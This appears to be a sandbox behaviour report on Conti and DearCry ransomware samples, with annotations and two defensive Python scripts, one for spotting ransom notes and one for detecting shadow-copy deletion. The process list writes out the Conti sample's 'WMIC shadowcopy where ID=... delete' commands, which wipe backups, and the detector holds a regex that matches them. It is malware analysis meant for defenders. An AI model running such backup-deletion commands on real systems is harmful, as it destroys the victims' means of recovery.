File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN03500_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\9.0\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_spellcheck.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00453_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18201_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\ie9props.propdesc C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\eu.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\extensions\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\net.properties C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00014_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImages.jpg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\zh-tw.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\COPYRIGHT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nassau C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\VisualElements\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02578_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\BUTTON.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174635.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FORM.JS C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\be.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
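
Two things a responder wants from a Files table like the one above are the ransom-note name (here R3ADM3.txt, created once per folder) and a profile of what was opened for modification. The script below is an added example, not code from the report or from the sample: ROWS are constructed from rows of the table (the acting process, identical on every row, is dropped) plus one made-up non-note creation to exercise the filter. It infers the note name from "same basename created under many distinct directories", which works without knowing the family, and it tallies modified files by extension and by install directory to show that the pass has no extension filter.

```python
# Added example, not part of the sandbox report. Paths are taken from the Files table;
# the scratch.tmp row is constructed noise.
from collections import Counter, defaultdict

ROWS = [
    ("File opened for modification", r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife"),
    ("File created", r"C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\R3ADM3.txt"),
    ("File opened for modification", r"C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DVDHM.POC"),
    ("File created", r"C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\R3ADM3.txt"),
    ("File created", r"C:\Program Files\Common Files\Microsoft Shared\ink\R3ADM3.txt"),
    ("File created", r"C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\R3ADM3.txt"),
    ("File opened for modification", r"C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo"),
    ("File opened for modification", r"C:\Program Files\7-Zip\Lang\eu.txt"),
    ("File created", r"C:\Program Files\VideoLAN\VLC\lua\extensions\R3ADM3.txt"),
    ("File created", r"C:\Users\Admin\AppData\Local\Temp\scratch.tmp"),  # constructed noise, not from the report
]


def split_path(path):
    """Windows path -> (directory, basename, lower-case extension or '' if none)."""
    directory, _, name = path.rpartition("\\")
    ext = name.rpartition(".")[2].lower() if "." in name else ""
    return directory, name, ext


def ransom_note_candidates(rows, min_dirs=3):
    """Basenames created under at least min_dirs distinct directories.
    A note is written once per folder, so its name recurs across unrelated
    paths; an encrypted payload file does not."""
    dirs_by_name = defaultdict(set)
    for action, path in rows:
        if action == "File created":
            directory, name, _ = split_path(path)
            dirs_by_name[name].add(directory)
    return {name: len(dirs) for name, dirs in dirs_by_name.items() if len(dirs) >= min_dirs}


def modification_profile(rows, depth=2):
    """Count files opened for modification by extension and by install root
    (drive plus the first `depth` path components)."""
    by_ext, by_root = Counter(), Counter()
    for action, path in rows:
        if action == "File opened for modification":
            _, _, ext = split_path(path)
            by_ext[ext or "<none>"] += 1
            by_root["\\".join(path.split("\\")[: depth + 1])] += 1
    return by_ext, by_root


if __name__ == "__main__":
    print("note candidates:", ransom_note_candidates(ROWS))
    by_ext, by_root = modification_profile(ROWS)
    print("by extension:", dict(by_ext))
    print("by install root:", dict(by_root))
```

The min_dirs threshold is the only tunable: on a full run the real note will be created in hundreds of directories, so set it well above what any installer or updater would produce. Only "File created" events feed the note heuristic; modification events are the files being encrypted and go into the profile instead.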

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A (this row is repeated 64 times in the report; the sandbox records the enumeration but no indicator)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
(The 20 WMIC.exe rows above repeat twice more in full and once more truncated after SeIncreaseQuotaPrivilege, one block per WMIC.exe instance. This is the privilege set WMIC.exe enables on its own token at startup, so the list reflects the tool rather than the sample; the LUIDs 33, 34 and 35 that the sandbox did not resolve to names are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege. The WMIC command lines themselves are listed under Processes.)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 536 wrote to memory of 2676 (4 rows) N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2676 wrote to memory of 2824 (3 rows) N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 2844 (4 rows) N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2708 (3 rows) N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 2556 (4 rows) N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2556 wrote to memory of 2608 (3 rows) N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 2592 (4 rows) N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2592 wrote to memory of 2972 (3 rows) N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 1800 (4 rows) N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1800 wrote to memory of 352 (3 rows) N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 592 (4 rows) N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 2040 (3 rows) N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 1916 (4 rows) N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 1916 wrote to memory of 1696 (3 rows) N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 580 (4 rows) N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 580 wrote to memory of 1040 (3 rows) N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 2020 (4 rows) N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
PID 2020 wrote to memory of 1044 (3 rows) N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 536 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe C:\Windows\system32\cmd.exe
(Identical rows are collapsed with their count. These writes are consistent with ordinary process creation, the parent populating the child it has just started, rather than injection; their value is the tree they reveal: the sample (PID 536) starts one cmd.exe per shadow copy and each cmd.exe starts one WMIC.exe. The matching command lines are under Processes.)

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{74D38716-7030-4BFD-B927-115ECEA7C372}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{74D38716-7030-4BFD-B927-115ECEA7C372}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{1B5750AE-3D19-4A1D-917C-FD657FD87F33}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{1B5750AE-3D19-4A1D-917C-FD657FD87F33}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{63CC0077-C804-4837-84F2-5617DF29F4F7}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{63CC0077-C804-4837-84F2-5617DF29F4F7}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{0EE84E8E-9CE9-4DE2-A7DD-EBBC3C42E703}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{0EE84E8E-9CE9-4DE2-A7DD-EBBC3C42E703}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CD71E7E4-9980-4112-82CF-3554C09685EB}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{CD71E7E4-9980-4112-82CF-3554C09685EB}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7459311B-7CF8-41C9-9F6B-56B19AD27291}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7459311B-7CF8-41C9-9F6B-56B19AD27291}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{8428BEA3-796B-41E7-8FDE-FF3F7A14B79E}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{8428BEA3-796B-41E7-8FDE-FF3F7A14B79E}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{210E0F43-9FB8-40B5-9090-EC0EAC92CC6A}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{210E0F43-9FB8-40B5-9090-EC0EAC92CC6A}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F1E34A01-7A72-421C-9E4D-5DA5706A8784}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{F1E34A01-7A72-421C-9E4D-5DA5706A8784}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{411231A5-4F54-4EE8-9679-AE46EFF66DCA}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{411231A5-4F54-4EE8-9679-AE46EFF66DCA}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{427F6911-4199-4894-9064-F24F0B79AB41}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{427F6911-4199-4894-9064-F24F0B79AB41}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{44535E90-C0F6-469D-B4BA-C34D5B335C90}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{44535E90-C0F6-469D-B4BA-C34D5B335C90}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7C225D06-D687-440D-8F1B-4D756E128942}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{7C225D06-D687-440D-8F1B-4D756E128942}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B29E708E-242E-4A8C-9368-655124940DC4}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B29E708E-242E-4A8C-9368-655124940DC4}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{082411FE-9F57-42CA-A9FB-BB28AB90A0A4}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{082411FE-9F57-42CA-A9FB-BB28AB90A0A4}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{668B7956-B389-4B75-A59B-9171186F15AB}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{668B7956-B389-4B75-A59B-9171186F15AB}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{A78157EC-FD2A-4CD1-B0BD-E828E80FEF0D}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{A78157EC-FD2A-4CD1-B0BD-E828E80FEF0D}'" delete

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4D1AD3DF-B27F-4B97-B1B1-35F98CCEA001}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{4D1AD3DF-B27F-4B97-B1B1-35F98CCEA001}'" delete
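
The Processes section shows the sample's shadow-copy removal in full: it enumerates the copies through the VSS COM API (the vssvc.exe activity and the "Uses Volume Shadow Copy service COM API" signature), then launches one cmd.exe per copy, each running WMIC.exe shadowcopy where "ID='{...}'" delete. That per-ID form slips past detections that only look for vssadmin delete shadows /all. The script below is an added example, not code from the report or the sample: it parses process-creation events for the WMIC per-ID delete, walks each match up to the root of its process tree, and alerts when one root has removed several distinct copies. EVENTS are constructed from the report: the image paths, command lines and PIDs 536, 2676, 2824, 2844 and 2708 come from the Processes and WriteProcessMemory tables; which GUID belongs to which PID, the placeholder parent PID 1940, and the benign vssadmin list row are assumptions made for the example.

```python
# Added example, not part of the sandbox report. Constructed events, see the lead-in.
import re
from collections import defaultdict

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"
CMD = r"C:\Windows\system32\cmd.exe"
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
ID1 = "{74D38716-7030-4BFD-B927-115ECEA7C372}"  # first shadow copy ID in the report
ID2 = "{1B5750AE-3D19-4A1D-917C-FD657FD87F33}"  # second


def wmic_delete(shadow_id):
    """The WMIC command line the report shows for one shadow copy ID."""
    return WMIC + " shadowcopy where \"ID='" + shadow_id + "'\" delete"


# (pid, ppid, image, command_line); order is arbitrary, as in real telemetry.
# PID 1940 is a placeholder for the sample's parent; PID 3000 is constructed noise.
EVENTS = [
    (2824, 2676, WMIC, wmic_delete(ID1)),
    (536, 1940, SAMPLE, '"' + SAMPLE + '"'),
    (2676, 536, CMD, "cmd.exe /c " + wmic_delete(ID1)),
    (2844, 536, CMD, "cmd.exe /c " + wmic_delete(ID2)),
    (2708, 2844, WMIC, wmic_delete(ID2)),
    (3000, 1940, CMD, "cmd.exe /c vssadmin list shadows"),  # lists, does not delete
]

# Matches the bare WMIC invocation and the cmd.exe /c wrapper alike, with or
# without quotes around the WHERE clause, and captures the shadow copy GUID.
SHADOWCOPY_DELETE = re.compile(
    r"""wmic(?:\.exe)?\s+shadowcopy\s+where\s+"?ID='(\{[0-9A-Fa-f-]{36}\})'"?\s+delete""",
    re.IGNORECASE,
)


def shadow_copy_deletions(events):
    """pid -> GUID for every process whose command line deletes one copy by ID."""
    found = {}
    for pid, _ppid, _image, cmdline in events:
        match = SHADOWCOPY_DELETE.search(cmdline)
        if match:
            found[pid] = match.group(1).upper()
    return found


def root_image(pid, parents, images):
    """Follow the parent chain upward until the parent is outside the event set."""
    seen = set()
    while pid not in seen and parents.get(pid) in images:
        seen.add(pid)
        pid = parents[pid]
    return images[pid]


def deletions_by_root(events):
    """Group deleted GUIDs under the root of the chain that issued them. The cmd.exe
    wrapper and its WMIC child both match, so a set collapses each deletion to one GUID."""
    parents = {pid: ppid for pid, ppid, _, _ in events}
    images = {pid: image for pid, _, image, _ in events}
    grouped = defaultdict(set)
    for pid, guid in shadow_copy_deletions(events).items():
        grouped[root_image(pid, parents, images)].add(guid)
    return {root: sorted(guids) for root, guids in grouped.items()}


def per_id_deletion_alerts(events, min_copies=2):
    """Roots that removed at least min_copies distinct shadow copies one ID at a time.
    A bulk 'vssadmin delete shadows /all' is a separate pattern not covered here."""
    return sorted((root, len(guids)) for root, guids in deletions_by_root(events).items()
                  if len(guids) >= min_copies)


if __name__ == "__main__":
    for root, count in per_id_deletion_alerts(EVENTS):
        print(f"{count} shadow copies deleted by ID under {root}")
```

Attributing to the root rather than to WMIC.exe or cmd.exe is the point: the processes that appear in the telemetry are signed Microsoft binaries, and only the grandparent identifies the sample. The report's run removed 18 copies this way; a threshold of two already separates it from an administrator deleting a single stale snapshot.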

Network

(Every connection below is a TCP/445 (SMB) attempt to a host in 10.127.0.0/24; no domain was resolved for any of them, so the Domain column is empty. One source opening SMB to this many distinct addresses within a single run is the shape of a sweep for reachable network shares, not of normal file-server use.)

Country Destination Domain Proto

Files

C:\Program Files\R3ADM3.txt

MD5 e6f001fc98cb51a0429ca5dc95f6a950
SHA1 16a73b95d0b5408fa95c97bc9f314f1eff4902b4
SHA256 acf1bb83790c25806dd3c29e0b453002397c7fe7abc25a3470ae4e3164f9f31b
SHA512 11e65ed0e80aedb497ab40edf5d3f756b121527cb1102408cdd9f146549c849a41a16fc908bb284c920b061c6b37723117b929de150a62cd61273c40e660168c

Analysis: behavioral23

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240704-en

Max time kernel

120s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

Signatures

DearCry

ransomware dearcry

Renames multiple (3370) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AZW3CQRP\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PTQYFUC8\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VUFNXJNN\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KIC1AX96\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DM9SSQC3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
